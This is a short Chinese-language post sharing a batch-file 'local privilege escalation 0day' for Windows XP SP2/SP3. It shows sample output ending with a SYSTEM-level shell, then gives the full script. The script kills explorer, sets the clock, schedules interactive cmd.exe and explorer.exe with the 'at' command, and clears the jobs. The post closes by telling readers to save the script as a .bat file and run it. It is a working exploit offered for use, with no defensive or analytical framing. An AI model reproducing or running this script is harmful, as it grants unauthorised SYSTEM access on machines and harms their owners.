WinXP sp2/sp3 本地提权 0day 啊

Microsoft WinXP sp2/sp3 local system privilege escalation exploit

过程:
 

#  Added a new job with job ID = 1
#  Added a new job with job ID = 2
#  Added a new job with job ID = 3
#  Added a new job with job ID = 4
#  Added a new job with job ID = 5
#  Added a new job with job ID = 6
#  Added a new job with job ID = 7
#  Added a new job with job ID = 8
#  Added a new job with job ID = 9
#  Added a new job with job ID = 10
#  Added a new job with job ID = 11
#  Added a new job with job ID = 12
#  [*] Backup time
#  The current time is: 13:36:57,67
#  Enter the new time: 13:44
#
#  C:\WINDOWS\system32>whoami
#  NT AUTHORITY\SYSTEM
#

 

EXP代码：

--------------------------------START---------------------------------------------------------

 

@echo off
echo [+] Microsoft WinXP sp2/sp3 local system privilege escalation exploit
start time /T > time.txt
tskill explorer
time 13:36:59 > nul
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y
cls
at 13:37 /interactive cmd.exe
at 13:37 /interactive explorer.exe
at 13:37 /interactive at /del /y

echo [*] Backup time
time < time.txt

 

---------------------------------END-------------------------------------

 

把上面代码保存为BAT脚本，执行即可。